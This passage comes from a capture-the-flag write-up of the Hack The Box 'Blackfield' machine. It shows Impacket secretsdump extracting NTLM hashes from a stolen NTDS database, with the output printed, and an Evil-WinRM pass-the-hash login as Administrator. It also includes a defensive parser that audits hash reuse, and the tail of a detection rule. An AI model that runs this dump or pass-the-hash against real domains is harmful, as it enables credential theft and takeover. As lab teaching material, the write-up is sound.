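    return alerts
```

A single scripted diskshadow run or a lone reg save is normal on a domain controller with a backup job, which is why the alert requires several distinct steps by the same account within the window.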
Now, Impacket will be our last tool, once again:
python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -ntds ntds.dit -system system.bak LOCAL
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 35640a3fd5111b93cc50e3b4e255ff8c
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:65557f7ad03ac340a7eb12b9462f80d6:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3c02561bba6ee4ad6cfd024ec8fda5d:::
audit2020:1103:aad3b435b51404eeaad3b435b51404ee:c95ac94a048e7c29ac4b4320d7c9d3b5:::
support:1104:aad3b435b51404eeaad3b435b51404ee:cead107bf11ebc28b3e6e90cde6de212:::
BLACKFIELD.local\BLACKFIELD764430:1105:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
BLACKFIELD.local\BLACKFIELD538365:1106:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
[...]
BLACKFIELD.local\BLACKFIELD438814:1412:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
svc_backup:1413:aad3b435b51404eeaad3b435b51404ee:9658d1d1dcd9250115e2205d9f48400d:::
BLACKFIELD.local\lydericlefebvre:1414:aad3b435b51404eeaad3b435b51404ee:a2bc62c44415e12302885d742b0a6890:::
PC01$:1415:aad3b435b51404eeaad3b435b51404ee:de1e7748b6b292bfff4fd5adb54b4608:::
[...]
[*] Cleaning up...
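The same dump is what a defender gets from a password audit of the directory, and the output above already shows one finding: several BLACKFIELD##### accounts share one NT hash. As an added example that is not part of the walkthrough, the parser below reads secretsdump's "domain\uid:rid:lmhash:nthash:::" lines and reports hash reuse across accounts, empty NT passwords and any account still storing a real LM hash; the sample lines are a constructed excerpt of the output shown above.

```python
from collections import defaultdict

# Constructed excerpt in secretsdump's "domain\uid:rid:lmhash:nthash:::" format,
# taken from the lines shown above (status lines like "[*] ..." are included on purpose).
DUMP_LINES = """\
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
BLACKFIELD.local\\BLACKFIELD764430:1105:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
BLACKFIELD.local\\BLACKFIELD538365:1106:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
svc_backup:1413:aad3b435b51404eeaad3b435b51404ee:9658d1d1dcd9250115e2205d9f48400d:::
[*] Cleaning up...
"""

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash stored when LM storage is disabled
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password


def parse_dump(text):
    """Yield (account, rid, lmhash, nthash) for each credential line; skip status lines."""
    for line in text.splitlines():
        if not line or line.startswith("["):
            continue
        parts = line.rstrip(":").split(":")
        if len(parts) < 4:
            continue
        yield parts[0], int(parts[1]), parts[2].lower(), parts[3].lower()


def audit(text):
    """Findings a defender acts on: accounts sharing one NT hash (password reuse),
    accounts with an empty password, and accounts that still carry a non-empty LM hash."""
    by_nt = defaultdict(list)
    empty_password, lm_present = [], []
    for account, rid, lm, nt in parse_dump(text):
        by_nt[nt].append(account)
        if nt == EMPTY_NT:
            empty_password.append(account)
        if lm != EMPTY_LM:
            lm_present.append(account)
    reuse = {nt: sorted(accts) for nt, accts in by_nt.items() if len(accts) > 1}
    return {"reuse": reuse, "empty_password": empty_password, "lm_present": lm_present}
```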
I could try to crack the Administrator's hash, but remember that Evil-WinRM is our best friend, with the capability of using a hash to connect to the target machine, so...
in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield/attack/smb2/memory_analysis$ sudo docker run --rm -ti --name evil-winrm -v /home/foo/ps1_scripts:/ps1_scripts -v /home/foo/exe_files:/exe_files -v /home/foo/data:/data oscarakaelvis/evil-winrm -i 10.10.10.192 -u Administrator -H 184fb5e5178480be64824d4cd53b99ee -s '/ps1_scripts/' -e '/exe_files/'
Evil-WinRM shell v2.1
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
8******************************b
*Evil-WinRM* PS C:\Users\Administrator\Documents>
And so the root flag is mine too. Thanks again, and sorry if my habit of describing my failures has made this article longer, but I hope you can learn from them!
That's all folks, see you next time!